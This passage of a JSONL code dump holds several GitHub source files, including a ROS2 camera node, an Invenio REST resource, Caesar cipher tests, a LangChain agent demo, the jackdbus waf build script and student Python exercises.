config_pb2.Config()\n\t\tconfig.ParseFromString(config_msg)\n\t\tsnapshot_msg = snapshot.serialize_request(\n\t\t\tconfig.fields\n\t\t\t)\n\t\tconnection.send_message(snapshot_msg)","repo_name":"idodi33/thinkpol","sub_path":"thinkpol/client/client_utils.py","file_name":"client_utils.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29897667301","text":"n = list(input()) # 입력받은 문자열을 리스트 형태로 변경\nn.sort(reverse=True) # 내림차순으로 정렬\nsum = 0\n\n# 각 자릿수를 더한 합\nfor i in n:\n sum += int(i) # 정수 형태로 변경해서 더함\n\n# 30의 배수의 조건 : 각 자릿수를 더한 값이 3의 배수이고, 끝자리가 0일것\nif sum % 3 != 0 or \"0\" not in n:\n print(-1)\nelse:\n print(''.join(n))","repo_name":"ShShin98/Baekjoon_CodingTest","sub_path":"greedy/#10610 30 (다시).py","file_name":"#10610 30 (다시).py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73112223185","text":"import rclpy\nfrom rclpy.node import Node\n# dependencies rclpy image_transport cv_bridge sensor_msgs std_msgs opencv2\nimport cv2\nimport cv2.aruco\nfrom cv_bridge import CvBridge \nfrom geometry_msgs.msg import TwistStamped\nfrom sensor_msgs.msg import Image\nfrom std_msgs.msg import Empty, String # For trigger message\nimport numpy as np\nimport time\n#import scipy\n#import skimage\n#from skimage import transform as tf\n\n\nclass ImageGrabber(Node):\n\n def __init__(self):\n super().__init__('image_grabber')\n self.image_publisher = self.create_publisher(Image, \"/image\", 10)\n self.cap = cv2.VideoCapture(f'nvarguscamerasrc sensor-mode=3 ! video/x-raw(memory:NVMM), width=1920, height=1080, format=(string)NV12, framerate=(fraction)29/1 ! nvvidconv ! video/x-raw, width=(int)1920, height=(int)1080, format=(string)BGRx ! videoconvert ! appsink')\n self.image = None\n self.bridge = CvBridge()\n self.current_time = time.time()\n\n if not self.cap.isOpened():\n print(\"Cannot open camera\")\n exit()\n\n def run(self):\n while True:\n ret, frame = self.cap.read()\n print(time.time())\n # if frame is read correctly ret is True\n if not ret:\n print(\"Can't receive frame (stream end?). Exiting ...\")\n break\n \"\"\"\n if time.time() - self.current_time > 5:\n cv2.imwrite(\"/var/www/html/image/image.png\", frame)\n self.current_time = time.time()\n\n self.image = frame\n \"\"\"\n self.image_publisher.publish(self.bridge.cv2_to_imgmsg(frame, \"bgr8\"))\n\ndef main(args=None):\n rclpy.init(args=args)\n\n grabber = ImageGrabber()\n\n grabber.run()\n\n rclpy.spin(grabber)\n\n # Destroy the node explicitly\n # (optional - otherwise it will be done automatically\n # when the garbage collector destroys the node object)\n grabber.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()","repo_name":"neduchal/lampone23_server","sub_path":"lampone23_server/image_grabber.py","file_name":"image_grabber.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4385180066","text":"from flask import g\nfrom flask_resources import Resource, resource_requestctx, response_handler, route\nfrom invenio_records_resources.resources.errors import ErrorHandlersMixin\nfrom invenio_records_resources.resources.records.resource import (\n request_data,\n request_search_args,\n request_view_args,\n)\nfrom invenio_records_resources.resources.records.utils import search_preference\n\n\nclass RecordCommunitiesResource(ErrorHandlersMixin, Resource):\n \"\"\"Record communities resource.\"\"\"\n\n def __init__(self, config, service):\n \"\"\"Constructor.\"\"\"\n super().__init__(config)\n self.service = service\n\n def create_url_rules(self):\n \"\"\"Create the URL rules for the record resource.\"\"\"\n routes = self.config.routes\n url_rules = [\n route(\"GET\", routes[\"list\"], self.search),\n route(\"POST\", routes[\"list\"], self.add_to_published_record),\n route(\"POST\", routes[\"draft-list\"], self.add_to_draft),\n route(\"DELETE\", routes[\"list\"], self.remove),\n ]\n return url_rules\n\n @request_search_args\n @request_view_args\n @response_handler(many=True)\n def search(self):\n \"\"\"Search for record's communities.\"\"\"\n items = self.service.search(\n identity=g.identity,\n id_=resource_requestctx.view_args[\"pid_value\"],\n params=resource_requestctx.args,\n search_preference=search_preference(),\n expand=resource_requestctx.args.get(\"expand\", False),\n )\n return items.to_dict(), 200\n\n @request_view_args\n @response_handler()\n @request_data\n def add_to_published_record(self):\n \"\"\"Include record in communities.\"\"\"\n processed, errors = self.service.add_to_published_record(\n identity=g.identity,\n id_=resource_requestctx.view_args[\"pid_value\"],\n data=resource_requestctx.data,\n )\n\n response = {}\n if processed:\n response[\"processed\"] = processed\n if errors:\n response[\"errors\"] = errors\n\n # TODO why not checking errors\n return response, 200 if len(processed) > 0 else 400\n\n @request_view_args\n @response_handler()\n @request_data\n def add_to_draft(self):\n \"\"\"Include record in communities.\"\"\"\n processed, errors = self.service.add_to_draft(\n identity=g.identity,\n id_=resource_requestctx.view_args[\"pid_value\"],\n data=resource_requestctx.data,\n )\n\n response = {}\n if processed:\n response[\"processed\"] = processed\n if errors:\n response[\"errors\"] = errors\n\n # TODO why not checking errors\n return response, 200 if len(processed) > 0 else 400\n\n @request_view_args\n @request_data\n @response_handler()\n def remove(self):\n \"\"\"Remove communities from the record.\"\"\"\n processed, errors = self.service.remove(\n identity=g.identity,\n id_=resource_requestctx.view_args[\"pid_value\"],\n data=resource_requestctx.data,\n )\n\n response = {}\n if errors:\n response[\"errors\"] = errors\n\n return response, 200 if len(processed) > 0 else 400\n","repo_name":"oarepo/oarepo-communities","sub_path":"oarepo_communities/resources/record_communities/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31288972879","text":"\"\"\"Unit Tests for the Caesar Cipher\"\"\"\nimport unittest\nfrom .context import caesar, cipher_exceptions\n\n\nclass CaesarCipherTest(unittest.TestCase):\n \"\"\"Unit Test Class\"\"\"\n\n MESSAGE_TO_ENCRYPT = \"This is my original message!\"\n MESSAGE_TO_DECRYPT = \"'uvF7vF7zL7BEvtvAny7zrFFntr.\"\n MESSAGE_TO_DECRYPT_SIMPLE_MODE = \"Guvf vf zl bevtvany zrffntr!\"\n KEY = 13\n\n def test_encrypt(self):\n \"\"\"Test the result of an encryption\"\"\"\n cipher = caesar.CaesarCipher(simple=False)\n encrypted_message = cipher.encrypt(self.MESSAGE_TO_ENCRYPT, self.KEY)\n self.assertEqual(encrypted_message, self.MESSAGE_TO_DECRYPT)\n\n def test_encrypt_simple(self):\n \"\"\"Test the result of an encryption using Simple mode\"\"\"\n cipher = caesar.CaesarCipher()\n encrypted_message = cipher.encrypt(self.MESSAGE_TO_ENCRYPT, self.KEY)\n self.assertEqual(\n encrypted_message,\n self.MESSAGE_TO_DECRYPT_SIMPLE_MODE\n )\n\n def test_decrypt_simple(self):\n \"\"\"Test the result of a decryption\"\"\"\n cipher = caesar.CaesarCipher()\n decrypted_message = cipher.decrypt(\n self.MESSAGE_TO_DECRYPT_SIMPLE_MODE,\n self.KEY\n )\n self.assertEqual(decrypted_message, self.MESSAGE_TO_ENCRYPT)\n\n def test_decrypt(self):\n \"\"\"Test the result of a decryption\"\"\"\n cipher = caesar.CaesarCipher(simple=False)\n decrypted_message = cipher.decrypt(self.MESSAGE_TO_DECRYPT, self.KEY)\n self.assertEqual(decrypted_message, \"This is my original message!\")\n\n def test_encrypt_method_incorrect_message(self):\n \"\"\"\n Test that the encrypt method raises\n an Exception if the message is incorrect\n \"\"\"\n with self.assertRaises(cipher_exceptions.IncorrectMessageError):\n caesar.CaesarCipher().encrypt(1, 13)\n\n def test_encrypt_method_incorrect_key(self):\n \"\"\"\n Test that the encrypt method raises\n an Exception if the key is incorrect\n \"\"\"\n with self.assertRaises(cipher_exceptions.IncorrectCipherKeyError):\n caesar.CaesarCipher().encrypt(\"This is another message\", \"a\")\n\n def test_decrypt_method_incorrect_message(self):\n \"\"\"\n Test that the decrypt method raises\n an Exception if the message is incorrect\n \"\"\"\n with self.assertRaises(cipher_exceptions.IncorrectMessageError):\n caesar.CaesarCipher().decrypt(1, 13)\n\n def test_decrypt_method_incorrect_key(self):\n \"\"\"\n Test that the decrypt method raises\n an Exception if the key is incorrect\n \"\"\"\n with self.assertRaises(cipher_exceptions.IncorrectCipherKeyError):\n caesar.CaesarCipher().decrypt(\"This is another message\", \"a\")\n\n def test_init_incorrect_symbols_list(self):\n \"\"\"\n Test that the init method raises\n an Exception if the symbols argument is incorrect\n \"\"\"\n with self.assertRaises(ValueError):\n caesar.CaesarCipher(simple=False, symbols=123)\n\n def test_cipher_incorrect_mode(self):\n \"\"\"\n Test that the cipher method raises\n an Exception if the mode argument is incorrect\n \"\"\"\n with self.assertRaises(ValueError):\n cipher = caesar.CaesarCipher()\n cipher.cipher(\"My message\", 2, mode=\"incorrect cipher type\")\n\n def test_reversible(self):\n \"\"\"Test that an encrypted message can be derypted with the same key\"\"\"\n cipher = caesar.CaesarCipher()\n\n encrypted_message = cipher.encrypt(self.MESSAGE_TO_ENCRYPT, self.KEY)\n decrypted_message = cipher.decrypt(encrypted_message, self.KEY)\n self.assertEqual(self.MESSAGE_TO_ENCRYPT, decrypted_message)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"MarcDillar/python-cipher","sub_path":"tests/caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74886049424","text":"from utilities import llm\nfrom langchain.chains import LLMMathChain\nfrom langchain.chains import LLMChain\nfrom langchain.memory import ConversationBufferMemory\nfrom langchain.prompts import PromptTemplate\nfrom langchain.agents import Tool\nfrom langchain.agents import initialize_agent\n\nclass LangChainAgent:\n def __init__(self):\n self.llm = llm\n\n self.llm_math = LLMMathChain(llm=self.llm)\n\n self.prompt = PromptTemplate(\n input_variables=[\"query\"],\n template=\"{query}\"\n )\n\n self.memory = ConversationBufferMemory(memory_key='chat_history')\n\n self.llm_chain = LLMChain(llm=self.llm, prompt=self.prompt)\n\n self.tools = []\n self.tools.append(\n Tool(\n name='Calculator',\n func=self.llm_math.run,\n description='useful for when you need to answer questions about math'\n )\n )\n self.tools.append(\n Tool(\n name='Language Model',\n func=self.llm_chain.run,\n description=\"use this tool for general purpose queries and logic\"\n )\n )\n\n self.zero_shot_agent = initialize_agent(\n agent=\"zero-shot-react-description\",\n tools=self.tools,\n llm=self.llm,\n verbose=True,\n max_iterations=3\n )\n\n self.conversational_agent = initialize_agent(\n agent='conversational-react-description',\n tools=self.tools,\n llm=self.llm,\n verbose=True,\n max_iterations=3,\n memory=self.memory\n )\n\n def run_zero_shot_agent(self, query):\n return self.zero_shot_agent(query)\n\n def run_conversational_agent(self, query):\n return self.conversational_agent(query)\n\nif __name__ == \"__main__\":\n langchain_agent = LangChainAgent()\n\n print(langchain_agent.run_zero_shot_agent(\"what is (4.5*2.1)^2.2 ?\"))\n print(langchain_agent.run_zero_shot_agent(\"what is the capital of India?\"))\n","repo_name":"riyarana10/Langchain","sub_path":"agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72227736466","text":"from __future__ import print_function\n\nimport os\nimport shutil\nimport sys\n\nfrom waflib import Logs, Options, TaskGen\nfrom waflib import Context\nfrom waflib.Build import BuildContext, CleanContext, InstallContext, UninstallContext\n\nVERSION = \"2.22.1\"\nAPPNAME = 'jackdbus'\n\n# these variables are mandatory ('/' are converted automatically)\ntop = '.'\nout = 'build'\n\ndef display_feature(conf, msg, build):\n if build:\n conf.msg(msg, 'yes', color='GREEN')\n else:\n conf.msg(msg, 'no', color='YELLOW')\n\n\ndef options(opt):\n # options provided by the modules\n opt.load('compiler_cxx')\n opt.load('compiler_c')\n opt.load('autooptions')\n\n # install directories\n opt.add_option(\n '--htmldir',\n type='string',\n default=None,\n help='HTML documentation directory [Default: /share/jack-audio-connection-kit/reference/html/',\n )\n opt.add_option('--libdir', type='string', help='Library directory [Default: /lib]')\n opt.add_option('--pkgconfigdir', type='string', help='pkg-config file directory [Default: /pkgconfig]')\n opt.add_option('--mandir', type='string', help='Manpage directory [Default: /share/man/man1]')\n\n # options affecting binaries\n opt.add_option(\n '--platform',\n type='string',\n default=sys.platform,\n help='Target platform for cross-compiling, e.g. cygwin or win32',\n )\n opt.add_option('--debug', action='store_true', default=False, dest='debug', help='Build debuggable binaries')\n\n #opt.set_auto_options_define('HAVE_%s')\n #opt.set_auto_options_style('yesno_and_hack')\n\n # options with third party dependencies\n #doxygen = opt.add_auto_option(\n # 'doxygen',\n # help='Build doxygen documentation',\n # conf_dest='BUILD_DOXYGEN_DOCS',\n # default=False)\n #doxygen.find_program('doxygen')\n\n # dbus options\n opt.recurse('dbus')\n\n # this must be called before the configure phase\n #opt.apply_auto_options_hack()\n\n\ndef detect_platform(conf):\n # GNU/kFreeBSD and GNU/Hurd are treated as Linux\n platforms = [\n # ('KEY, 'Human readable name', ['strings', 'to', 'check', 'for'])\n ('IS_LINUX', 'Linux', ['gnu0', 'gnukfreebsd', 'linux', 'posix']),\n ('IS_FREEBSD', 'FreeBSD', ['freebsd']),\n ('IS_MACOSX', 'MacOS X', ['darwin']),\n ('IS_SUN', 'SunOS', ['sunos']),\n ('IS_WINDOWS', 'Windows', ['cygwin', 'msys', 'win32'])\n ]\n\n for key, name, strings in platforms:\n conf.env[key] = False\n\n conf.start_msg('Checking platform')\n platform = Options.options.platform\n for key, name, strings in platforms:\n for s in strings:\n if platform.startswith(s):\n conf.env[key] = True\n conf.end_msg(name, color='CYAN')\n break\n\nclass WafToolchainFlags:\n \"\"\"\n Waf helper class for handling set of CFLAGS\n and related. The flush() method will\n prepend so to allow supplied by (downstream/distro/builder) waf caller flags\n to override the upstream flags in wscript.\n TODO: upstream this or find alternative easy way of doing the same\n \"\"\"\n def __init__(self, conf):\n \"\"\"\n :param conf: Waf configuration object\n \"\"\"\n self.conf = conf\n self.flags = {}\n for x in ('CPPFLAGS', 'CFLAGS', 'CXXFLAGS', 'LINKFLAGS'):\n self.flags[x] = []\n\n def flush(self):\n \"\"\"\n Flush flags to the configuration object\n Prepend is used so to allow supplied by\n (downstream/distro/builder) waf caller flags\n to override the upstream flags in wscript.\n \"\"\"\n for key, val in self.flags.items():\n self.conf.env.prepend_value(key, val)\n\n def add(self, key, val):\n \"\"\"\n :param key: Set to add flags to. 'CPPFLAGS', 'CFLAGS', 'CXXFLAGS' or 'LINKFLAGS'\n :param val: string or list of strings\n \"\"\"\n flags = self.flags[key]\n if isinstance(val, list):\n\t #flags.extend(val)\n for x in val:\n if not isinstance(x, str):\n raise Exception(\"value must be string or list of strings. \", type(x))\n flags.append(x)\n elif isinstance(val, str):\n flags.append(val)\n else:\n raise Exception(\"value must be string or list of strings\")\n\n def add_cpp(self, value):\n \"\"\"\n Add flag or list of flags to CPPFLAGS\n :param value: string or list of strings\n \"\"\"\n self.add('CPPFLAGS', value)\n\n def add_c(self, value):\n \"\"\"\n Add flag or list of flags to CFLAGS\n :param value: string or list of strings\n \"\"\"\n self.add('CFLAGS', value)\n\n def add_cxx(self, value):\n \"\"\"\n Add flag or list of flags to CXXFLAGS\n :param value: string or list of strings\n \"\"\"\n self.add('CXXFLAGS', value)\n\n def add_candcxx(self, value):\n \"\"\"\n Add flag or list of flags to CFLAGS and CXXFLAGS\n :param value: string or list of strings\n \"\"\"\n self.add_c(value)\n self.add_cxx(value)\n\n def add_link(self, value):\n \"\"\"\n Add flag or list of flags to LINKFLAGS\n :param value: string or list of strings\n \"\"\"\n self.add('LINKFLAGS', value)\n\ndef configure(conf):\n conf.load('compiler_cxx')\n conf.load('compiler_c')\n\n detect_platform(conf)\n flags = WafToolchainFlags(conf)\n\n conf.check_cfg(package='jackserver', uselib_store='JACKSERVER', args=[\"--cflags\", \"--libs\"])\n\n conf.check_cfg(package='expat', args='--cflags --libs')\n\n flags.add_c('-Wall')\n flags.add_cxx(['-Wall', '-Wno-invalid-offsetof'])\n flags.add_cxx('-std=gnu++11')\n\n if conf.env['IS_FREEBSD']:\n conf.check(lib='execinfo', uselib='EXECINFO', define_name='EXECINFO')\n conf.check_cfg(package='libsysinfo', args='--cflags --libs')\n\n if not conf.env['IS_MACOSX']:\n conf.env.append_unique('LDFLAGS', '-Wl,--no-undefined')\n else:\n conf.check(lib='aften', uselib='AFTEN', define_name='AFTEN')\n conf.check_cxx(\n fragment=''\n + '#include \\n'\n + 'int\\n'\n + 'main(void)\\n'\n + '{\\n'\n + 'AftenContext fAftenContext;\\n'\n + 'aften_set_defaults(&fAftenContext);\\n'\n + 'unsigned char *fb;\\n'\n + 'float *buf=new float[10];\\n'\n + 'int res = aften_encode_frame(&fAftenContext, fb, buf, 1);\\n'\n + '}\\n',\n lib='aften',\n msg='Checking for aften_encode_frame()',\n define_name='HAVE_AFTEN_NEW_API',\n mandatory=False)\n\n # TODO\n flags.add_cxx('-Wno-deprecated-register')\n\n conf.load('autooptions')\n\n conf.env['LIB_PTHREAD'] = ['pthread']\n conf.env['LIB_DL'] = ['dl']\n conf.env['LIB_RT'] = ['rt']\n conf.env['LIB_M'] = ['m']\n conf.env['LIB_STDC++'] = ['stdc++']\n conf.env['JACK_VERSION'] = VERSION\n\n conf.env['BINDIR'] = conf.env['PREFIX'] + '/bin'\n\n if Options.options.htmldir:\n conf.env['HTMLDIR'] = Options.options.htmldir\n else:\n # set to None here so that the doxygen code can find out the highest\n # directory to remove upon install\n conf.env['HTMLDIR'] = None\n\n if Options.options.libdir:\n conf.env['LIBDIR'] = Options.options.libdir\n else:\n conf.env['LIBDIR'] = conf.env['PREFIX'] + '/lib'\n\n if Options.options.pkgconfigdir:\n conf.env['PKGCONFDIR'] = Options.options.pkgconfigdir\n else:\n conf.env['PKGCONFDIR'] = conf.env['LIBDIR'] + '/pkgconfig'\n\n if Options.options.mandir:\n conf.env['MANDIR'] = Options.options.mandir\n else:\n conf.env['MANDIR'] = conf.env['PREFIX'] + '/share/man/man1'\n\n if conf.env['BUILD_DEBUG']:\n flags.add_candcxx('-g')\n flags.add_link('-g')\n\n conf.define('JACK_VERSION', conf.env['JACK_VERSION'])\n conf.write_config_header('config.h', remove=False)\n\n conf.recurse('dbus')\n\n flags.flush()\n\n print()\n version_msg = APPNAME + \"-\" + VERSION\n if os.access('version.h', os.R_OK):\n data = open('version.h').read()\n m = re.match(r'^#define GIT_VERSION \"([^\"]*)\"$', data)\n if m != None:\n version_msg += \" exported from \" + m.group(1)\n elif os.access('.git', os.R_OK):\n version_msg += \" git revision will be checked and eventually updated during build\"\n print(version_msg)\n\n conf.msg('Install prefix', conf.env['PREFIX'], color='CYAN')\n conf.msg('Library directory', conf.all_envs['']['LIBDIR'], color='CYAN')\n display_feature(conf, 'Build debuggable binaries', conf.env['BUILD_DEBUG'])\n\n tool_flags = [\n ('C compiler flags', ['CFLAGS', 'CPPFLAGS']),\n ('C++ compiler flags', ['CXXFLAGS', 'CPPFLAGS']),\n ('Linker flags', ['LINKFLAGS', 'LDFLAGS'])\n ]\n for name, vars in tool_flags:\n flags = []\n for var in vars:\n flags += conf.all_envs[''][var]\n conf.msg(name, repr(flags), color='NORMAL')\n\n #conf.summarize_auto_options()\n\n conf.msg('D-Bus service install directory', conf.env['DBUS_SERVICES_DIR'], color='CYAN')\n\n if conf.env['DBUS_SERVICES_DIR'] != conf.env['DBUS_SERVICES_DIR_REAL']:\n print()\n print(Logs.colors.RED + 'WARNING: D-Bus session services directory as reported by pkg-config is')\n print(Logs.colors.RED + 'WARNING:', end=' ')\n print(Logs.colors.CYAN + conf.env['DBUS_SERVICES_DIR_REAL'])\n print(Logs.colors.RED + 'WARNING: but service file will be installed in')\n print(Logs.colors.RED + 'WARNING:', end=' ')\n print(Logs.colors.CYAN + conf.env['DBUS_SERVICES_DIR'])\n print(\n Logs.colors.RED + 'WARNING: You may need to adjust your D-Bus configuration after installing jackdbus'\n )\n print('WARNING: You can override dbus service install directory')\n print('WARNING: with --enable-pkg-config-dbus-service-dir option to this script')\n print(Logs.colors.NORMAL, end=' ')\n print()\n\ndef git_ver(self):\n bld = self.generator.bld\n header = self.outputs[0].abspath()\n if os.access('./version.h', os.R_OK):\n header = os.path.join(os.getcwd(), out, \"version.h\")\n shutil.copy('./version.h', header)\n data = open(header).read()\n m = re.match(r'^#define GIT_VERSION \"([^\"]*)\"$', data)\n if m != None:\n self.ver = m.group(1)\n Logs.pprint('BLUE', \"tarball from git revision \" + self.ver)\n else:\n self.ver = \"tarball\"\n return\n\n if bld.srcnode.find_node('.git'):\n self.ver = bld.cmd_and_log(\"LANG= git rev-parse HEAD\", quiet=Context.BOTH).splitlines()[0]\n if bld.cmd_and_log(\"LANG= git diff-index --name-only HEAD\", quiet=Context.BOTH).splitlines():\n self.ver += \"-dirty\"\n\n Logs.pprint('BLUE', \"git revision \" + self.ver)\n else:\n self.ver = \"unknown\"\n\n fi = open(header, 'w')\n fi.write('#define GIT_VERSION \"%s\"\\n' % self.ver)\n fi.close()\n\ndef build(bld):\n bld(rule=git_ver, target='version.h', update_outputs=True, always=True, ext_out=['.h'])\n\n # process subfolders from here\n\n if bld.env['IS_LINUX'] or bld.env['IS_FREEBSD']:\n bld.recurse('man')\n bld.recurse('dbus')\n\n if bld.env['BUILD_DOXYGEN_DOCS']:\n html_build_dir = bld.path.find_or_declare('html').abspath()\n\n bld(\n features='subst',\n source='doxyfile.in',\n target='doxyfile',\n HTML_BUILD_DIR=html_build_dir,\n SRCDIR=bld.srcnode.abspath(),\n VERSION=VERSION\n )\n\n # There are two reasons for logging to doxygen.log and using it as\n # target in the build rule (rather than html_build_dir):\n # (1) reduce the noise when running the build\n # (2) waf has a regular file to check for a timestamp. If the directory\n # is used instead waf will rebuild the doxygen target (even upon\n # install).\n def doxygen(task):\n doxyfile = task.inputs[0].abspath()\n logfile = task.outputs[0].abspath()\n cmd = '%s %s &> %s' % (task.env['DOXYGEN'][0], doxyfile, logfile)\n return task.exec_command(cmd)\n\n bld(\n rule=doxygen,\n source='doxyfile',\n target='doxygen.log'\n )\n\n # Determine where to install HTML documentation. Since share_dir is the\n # highest directory the uninstall routine should remove, there is no\n # better candidate for share_dir, but the requested HTML directory if\n # --htmldir is given.\n if bld.env['HTMLDIR']:\n html_install_dir = bld.options.destdir + bld.env['HTMLDIR']\n share_dir = html_install_dir\n else:\n share_dir = bld.options.destdir + bld.env['PREFIX'] + '/share/jack-audio-connection-kit'\n html_install_dir = share_dir + '/reference/html/'\n\n if bld.cmd == 'install':\n if os.path.isdir(html_install_dir):\n Logs.pprint('CYAN', 'Removing old doxygen documentation installation...')\n shutil.rmtree(html_install_dir)\n Logs.pprint('CYAN', 'Removing old doxygen documentation installation done.')\n Logs.pprint('CYAN', 'Installing doxygen documentation...')\n shutil.copytree(html_build_dir, html_install_dir)\n Logs.pprint('CYAN', 'Installing doxygen documentation done.')\n elif bld.cmd == 'uninstall':\n Logs.pprint('CYAN', 'Uninstalling doxygen documentation...')\n if os.path.isdir(share_dir):\n shutil.rmtree(share_dir)\n Logs.pprint('CYAN', 'Uninstalling doxygen documentation done.')\n elif bld.cmd == 'clean':\n if os.access(html_build_dir, os.R_OK):\n Logs.pprint('CYAN', 'Removing doxygen generated documentation...')\n shutil.rmtree(html_build_dir)\n Logs.pprint('CYAN', 'Removing doxygen generated documentation done.')\n\n\n@TaskGen.extension('.mm')\ndef mm_hook(self, node):\n \"\"\"Alias .mm files to be compiled the same as .cpp files, gcc will do the right thing.\"\"\"\n return self.create_compiled_task('cxx', node)\n","repo_name":"LADI/jackdbus","sub_path":"wscript","file_name":"wscript","file_ext":"","file_size_in_byte":14287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33708697818","text":"'''作业1:中国合法工作年龄为18-60岁,即如果年龄小于18的情况为童工,不合法;如果年龄在18-60岁之间为合法工龄;大于60岁为法定退休年龄。\r\n需求:输入年龄判断输出结论\r\n如果年龄小于18,为童工,不合法;如果年龄18-60岁之间,为合法工作年龄如果年龄大于60为退休年龄'''\r\nprint(\"20012374董亚杰\")\r\nage=int(input(\"请输入您的年龄\"))\r\nwhile age>0:\r\n if age<18 :\r\n print(\"当年年龄\"+str(age)+\"为合法工龄\")\r\n break\r\n elif age<=60 :#不满足第一个if 执行elif\r\n print(\"当年年龄\"+str(age)+\"年龄不合法\")\r\n break\r\n else:\r\n print(\"当年年龄\"+str(age) + \"年龄为退休年龄\")\r\n break\r\nelse:\r\n print(\"请输入合法年龄\")\r\n'''作业2:坐公交:如果有钱可以上车,没有钱,不能上车;如果上车了,判断是否能坐下-—是否有空座位'''\r\nmoney=int(input(\"您当前零钱是多少呢?\"+'\\n'))\r\nwhile money>3:\r\n print(str(money)+\"车票收取成功,欢迎上车!\")\r\n empty_place = int(input(\"公交车空余位置为\"))\r\n if empty_place>0:\r\n print(\"当前空余位置为\"+str(empty_place) + \"有空位请就坐!\")\r\n break\r\n elif empty_place<=0:\r\n print(\"当前空余位置为\"+str(empty_place) + \"没有空位!\")\r\n break\r\nelse:\r\n print(str(money) + \"车票收取失败,请再次付款,不能上车!\")\r\n'''作业3:多种方法:判断某一年是否为闰年。判断闰年的条件是:年份能被4整除但不能被100整除,或者能被400整除'''\r\n#方法一:\r\nyear=int(input(\"请输入一个年份:\"))\r\nif ((year%4==0)and(year%100!=0))or(year%400==0):\r\n\tprint('当前年份'+str(year)+\"为闰年\")\r\nelse:\r\n\tprint('当前年份'+str(year)+\"不是闰年\")\r\n#方法二:\r\nimport calendar\r\nyear = int(input(\"请输入一个年份:\"))\r\ncheck_year = calendar.isleap(year)\r\nif check_year == True:\r\n print('当前年份'+str(year)+\"为闰年\")\r\nelse:\r\n print('当前年份'+str(year)+\"不是闰年\")\r\n","repo_name":"IPython1/Python-","sub_path":"Python程序设计-WYM/董亚杰_20012374_作业_20220830.py","file_name":"董亚杰_20012374_作业_20220830.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"74883078546","text":"import time\n\nimport cv2\nimport sounddevice as sd\n\nfrom video_reader.opencv import init_capture, read_video, release_capture\nfrom video_reader.audio import init_audio, read_audio, audio_samples, audio_finished, release_audio\n\nvideo_path = \"../resource/video.mp4\"\naudio_path = \"../resource/audio.mp3\"\n\ninit_capture(video_path)\ninit_audio(audio_path)\n\nstart_time_ns = time.time_ns()\nms2ns = 10**6\n\nsr, samples, channels = audio_samples()\nshould_out = sr\n\n# def callback(outdata, frames:int, time_, status):\n# global should_out\n# print(should_out)\n# if should_out >= frames:\n# samples, time_ns = read_audio( frames )\n# # print(frames)\n# # outdata.shape = samples.shape\n# outdata[:] = samples\n# should_out -= frames\n# else:\n# samples, time_ns = read_audio( should_out )\n# outdata[:should_out] = samples\n# outdata[should_out:] = 0\n# should_out = 0\n\ndef callback(outdata, frames:int, time_, status):\n samples, time_ns = read_audio( frames )\n outdata[:] = samples\n\nwith sd.OutputStream(sr, channels=channels, blocksize=0, callback=callback) as stream:\n # 循环读取并显示视频帧\n last_time_ms = 0\n while True:\n # 读取一帧视频\n ret, frame, file_time_ms ,time_ns = read_video()\n # 如果读取失败,说明视频结束\n if not ret:\n break\n \n should_out += round((file_time_ms - last_time_ms) / 1000 * sr)\n last_time_ms = file_time_ms\n\n interval = max(1, int(file_time_ms - (time_ns - start_time_ns) / ms2ns))\n # print(interval)\n\n # 显示视频帧\n cv2.imshow(\"Video\", frame)\n\n # 设置每帧的延迟时间为 interval\n key = cv2.waitKey(interval)\n\n # 如果按下 c 键,退出循环\n if key == ord(\"c\"):\n break\n\n# 释放 VideoCapture 对象和窗口\nrelease_capture()\ncv2.destroyAllWindows()\n\nrelease_audio()\n","repo_name":"duolanda/cpp_python_video","sub_path":"py/tests/opencv_audio.py","file_name":"opencv_audio.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42597550044","text":"import logging\n\n# Create a custom logger\nimport os\nimport datetime\n# util file must be placed in root\n\n\ndef get_filelogger(name, filepath = 'file.log'):\n logger = logging.getLogger(name)\n if not len(logger.handlers):\n f_handler = logging.FileHandler(filepath)\n f_handler.setLevel(logging.INFO)\n f_format = logging.Formatter('%(asctime)s - %(name)s - %(processName)s - %(threadName)s - %(levelname)s - %(message)s')\n f_handler.setFormatter(f_format)\n logger.addHandler(f_handler)\n logger.setLevel(logging.INFO)\n return logger\n\n\ndef get_logger(name):\n logger = logging.getLogger(name)\n # Create handlers\n if not len(logger.handlers):\n c_handler = logging.StreamHandler()\n c_handler.setLevel(logging.INFO)\n c_format = logging.Formatter('%(asctime)s - %(name)s - %(processName)s - %(threadName)s - %(levelname)s - %(message)s')\n c_handler.setFormatter(c_format)\n logger.addHandler(c_handler)\n logger.setLevel(logging.INFO)\n return logger\n\n\ndef get_full_path(*args):\n \"\"\"get the absolute path of file relative to root/utils file\n\n Args:\n args (str): string paths to join to make an absolute path\n\n Returns:\n str: full absolute path\n \"\"\"\n\n ROOT_PATH = __file__\n ROOT_DIR = os.path.dirname(ROOT_PATH)\n abs_path = os.path.join(ROOT_DIR, *args)\n abs_path = os.path.abspath(abs_path)\n\n return abs_path\n\n\ndef get_model_path(task_name, model_name, model_dir='../models', checkpoint=True, epoch=1, val_acc=0.9):\n\n if checkpoint == True:\n model_file_name = f'cp-{model_name}-{epoch}-{val_acc}.ckpt'\n else:\n model_file_name = 